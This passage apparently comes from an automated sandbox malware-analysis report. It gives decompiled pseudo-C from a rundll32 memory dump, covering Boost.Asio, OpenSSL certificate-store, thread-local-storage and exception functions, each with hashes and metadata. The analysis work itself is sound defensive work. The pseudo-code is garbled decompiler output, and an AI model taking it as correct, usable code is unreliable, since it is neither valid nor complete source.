				_t27 =  *((intOrPtr*)(__rcx + 0x10));
				_t2 = _t27 + 0x34;
				 *_t2 = 1;
				if ( *_t2 != 0) goto 0x386f0105;
				_t4 = _t27 + 0x38;
				 *_t4 = 1;
				if ( *_t4 != 0) goto 0x386f0105;
				r9d = 0;
				r8d = 0;
				if (PostQueuedCompletionStatus(??, ??, ??, ??) != 0) goto 0x386f0105;
				_v8 = __rbx;
				_t14 = GetLastError();
				_v24 = _t14;
				_t15 = E000001C31C33880D880( *((intOrPtr*)(_t27 + 0x28)), _t29);
				_v16 = _t23;
				if (_t14 != 0) goto 0x386f010a;
				return _t15;
			}











                                        0x1c3386f00b0
                                        0x1c3386f00b4
                                        0x1c3386f00bf
                                        0x1c3386f00bf
                                        0x1c3386f00c4
                                        0x1c3386f00c6
                                        0x1c3386f00c6
                                        0x1c3386f00cb
                                        0x1c3386f00d1
                                        0x1c3386f00d4
                                        0x1c3386f00df
                                        0x1c3386f00e1
                                        0x1c3386f00e6
                                        0x1c3386f00ee
                                        0x1c3386f00f2
                                        0x1c3386f00f9
                                        0x1c3386f0103
                                        0x1c3386f0109

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CompletionErrorInit_thread_footerLastPostQueuedStatus
                                        • String ID: pqcs
                                        • API String ID: 1235608404-2559862021
                                        • Opcode ID: 1d1bc266588ec55be32d97afc5100d9174a4c41dbe7fa0ea700753218c8ec9d3
                                        • Instruction ID: 01a437385b9b751fcdec7b610c4bab86cbc86478897310a6b07815d0a812c6a6
                                        • Opcode Fuzzy Hash: 1d1bc266588ec55be32d97afc5100d9174a4c41dbe7fa0ea700753218c8ec9d3
                                        • Instruction Fuzzy Hash: 6B11E236740B8185FB618B18E440B9A7360FB84754F54A322EEBD0B7A0EF38C6528702
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338711C10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::dereference(const struct std::integral_constant<unsigned __int64,3> &, xrefs: 000001C338711C64
                                        • invalid iterator, xrefs: 000001C338711C34
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow__std_exception_copy
                                        • String ID: class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::dereference(const struct std::integral_constant<unsigned __int64,3> &$invalid iterator
                                        • API String ID: 1552479455-487838338
                                        • Opcode ID: 81102135a62a48b02b4cb08a7679de3dbc5be90462a9374d6e47661d34dc8c28
                                        • Instruction ID: 5228dee451b3fefaa368ad3b00ea33dbabe372cfd7198cf3f6c195f4537e86d2
                                        • Opcode Fuzzy Hash: 81102135a62a48b02b4cb08a7679de3dbc5be90462a9374d6e47661d34dc8c28
                                        • Instruction Fuzzy Hash: 54016132364B8095F740DB14E584B9D6365F7843A0F51A222DA7D4B7A5EB39CA96C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3386EE680 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception$FileHeaderRaiseThrow__std_exception_copy
                                        • String ID: asio.misc
                                        • API String ID: 435636982-1213265728
                                        • Opcode ID: 80bd005db408badd54749ad8a33016f3392768a8e73afec91e094aba6e83ab38
                                        • Instruction ID: 54a8f6c8cfc102b1aed4c3026d6d9c9931e9ef5e04bd14e94bc1b8d00fb2616b
                                        • Opcode Fuzzy Hash: 80bd005db408badd54749ad8a33016f3392768a8e73afec91e094aba6e83ab38
                                        • Instruction Fuzzy Hash: F5111D32159FC195E6618B18F8807CAB3B4F785354F50A226E6ED46AB9EF38C295CB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338730650 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42encryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 24%
                                        			E000001C31C338730650(void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __rsi, void* __rbp, void* __r9, long long _a8, long long _a24, void* _a56) {
				intOrPtr _t25;
				long long _t30;
				void* _t33;
				char* _t35;

				_t33 = __rcx;
				_a8 = __rbx;
				E000001C31C33880C220();
				if (__rdx != 0) goto 0x38730680;
				_t25 =  *((intOrPtr*)(__rcx + 0x28));
				_t30 =  !=  ? _t25 : "MY";
				_t35 = "Opening certificate store %s\n";
				E000001C31C33872D790(_t25, _t35, _t30, __r9);
				r9d =  *((intOrPtr*)(__rcx + 0x38));
				r8d = 0;
				_a24 = _t30;
				__imp__CertOpenStore();
				if (_t25 != 0) goto 0x387306ea;
				if ( *0x38909020 != 0) goto 0x387306c3;
				 *0x38909020 = E000001C31C338721CE0(_t25);
				_a24 = 0x56d;
				_t7 = _t35 + 1; // 0x6e
				r8d = _t7;
				E000001C31C3387222D0(_t12, 0x6d,  *0x38909020, _t25, _t25, _t33, _t35, __rsi, __rbp, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				return E000001C31C33872DA10( *0x38909020, _t25, _t35);
			}







                                        0x1c338730650
                                        0x1c338730650
                                        0x1c33873065b
                                        0x1c33873066c
                                        0x1c33873066e
                                        0x1c33873067c
                                        0x1c338730683
                                        0x1c33873068a
                                        0x1c33873068f
                                        0x1c338730695
                                        0x1c338730698
                                        0x1c3387306a0
                                        0x1c3387306ac
                                        0x1c3387306b6
                                        0x1c3387306bd
                                        0x1c3387306c8
                                        0x1c3387306d9
                                        0x1c3387306d9
                                        0x1c3387306dd
                                        0x1c3387306f4

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CertOpenStore
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$Opening certificate store %s
                                        • API String ID: 1485946479-1252851234
                                        • Opcode ID: 9d53cb555343fd6b92ab722da439360fa3f680574fe33003ecfe1ec5044ef8eb
                                        • Instruction ID: d2755260a1ae89a0dc4ed5baa078d38c0fffb7e8788573b233f18a154f235882
                                        • Opcode Fuzzy Hash: 9d53cb555343fd6b92ab722da439360fa3f680574fe33003ecfe1ec5044ef8eb
                                        • Instruction Fuzzy Hash: C0118EB234068086FB50DF15E804BC973A2FB48B84F58E12799684B765EB3DCB548B02
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3386F4140 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 56%
                                        			E000001C31C3386F4140(void* __rax) {
				char _v80;
				char _v168;
				long long _v176;
				char _v184;
				char _v192;
				long long _v200;
				char _v208;
				char _v216;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t32;
				void* _t41;
				void* _t42;
				void* _t43;

				_t27 = __rax;
				_v176 = 0xfffffffe;
				E000001C31C3388122E0(_t21, _t22, _t23, _t24, __rax, _t31, _t32, _t42, _t43);
				if (_t27 != 0) goto 0x386f41d1;
				_v216 = 0x3889d200;
				_v208 = 0x3889d200;
				_v200 = 0x3889d200;
				_v192 = "could not convert calendar time to UTC time";
				_v184 = 1;
				E000001C31C33880E0E4(_t31,  &_v192,  &_v208, _t41, _t42);
				_v216 = 0x3889d2a0;
				E000001C31C3386FE670(_t31,  &_v80,  &_v216);
				E000001C31C3386FE710(_t20, _t31,  &_v168, 0x3889d2a0, _t42);
				return E000001C31C3388103EC(_t31,  &_v168, 0x388e4ab0, _t42);
			}






















                                        0x1c3386f4140
                                        0x1c3386f4147
                                        0x1c3386f4150
                                        0x1c3386f4158
                                        0x1c3386f4161
                                        0x1c3386f4168
                                        0x1c3386f416d
                                        0x1c3386f4179
                                        0x1c3386f417e
                                        0x1c3386f418d
                                        0x1c3386f419a
                                        0x1c3386f41ac
                                        0x1c3386f41ba
                                        0x1c3386f41d8

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception__std_exception_copy$FileHeaderRaiseThrow
                                        • String ID: could not convert calendar time to UTC time
                                        • API String ID: 3608347590-2088861013
                                        • Opcode ID: 08325126d70ff154f36be883b281417ee04c66a59bb5f007141d1d98415ad404
                                        • Instruction ID: 84654ae148a74902057b318b1f956643c038d41537ed96526f6dafb75c7d4cac
                                        • Opcode Fuzzy Hash: 08325126d70ff154f36be883b281417ee04c66a59bb5f007141d1d98415ad404
                                        • Instruction Fuzzy Hash: CC012D32259BC195FA60DB10E4407DAB3A4F785364F80A326E6BD46AA9EF6CC349C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338701E80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E000001C31C338701E80(long long __rax, long long __rbx, long long __rsi, long long _a8, long long _a16) {
				long long _v16;
				intOrPtr _v24;
				long long _v32;
				long long _v40;
				long _t10;
				void* _t13;
				long _t14;
				long long _t18;
				void* _t22;
				void* _t24;

				_t18 = __rax;
				_v40 = 0xfffffffe;
				_a8 = __rbx;
				_a16 = __rsi;
				_v32 = 0x3890b688;
				_t10 = TlsAlloc();
				if (_t10 != 0xffffffff) goto 0x38701ede;
				_t14 = GetLastError();
				E000001C31C33880D880(_t22, _t24);
				_v24 = _t14;
				_v16 = _t18;
				if (_t14 == 0) goto 0x38701ede;
				_t13 = E000001C31C3386EE680("tss");
				asm("int3");
				 *0x3890b688 = _t10;
				return _t13;
			}













                                        0x1c338701e80
                                        0x1c338701e86
                                        0x1c338701e8f
                                        0x1c338701e94
                                        0x1c338701ea0
                                        0x1c338701ea5
                                        0x1c338701eb0
                                        0x1c338701eb8
                                        0x1c338701eba
                                        0x1c338701ebf
                                        0x1c338701ec3
                                        0x1c338701eca
                                        0x1c338701ed8
                                        0x1c338701edd
                                        0x1c338701ede
                                        0x1c338701ef6

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocErrorExceptionInit_thread_footerLastThrow__std_exception_copy
                                        • String ID: tss
                                        • API String ID: 1176384431-1638339373
                                        • Opcode ID: c66cd73c7aa0eac1c00c9ada76600de5f76c2fd3cc8cac3decf1b725954ce2c9
                                        • Instruction ID: d377e489739e1d0e39c275e265cfd38f1c2bd8cbf16cdf6b5f96795e249f7172
                                        • Opcode Fuzzy Hash: c66cd73c7aa0eac1c00c9ada76600de5f76c2fd3cc8cac3decf1b725954ce2c9
                                        • Instruction Fuzzy Hash: 15F04F72644BC082F6109F65B884989A360F7847B4F549316FAB547BE8DB78C6558B01
                                        Uniqueness

                                        Uniqueness Score: -1.00%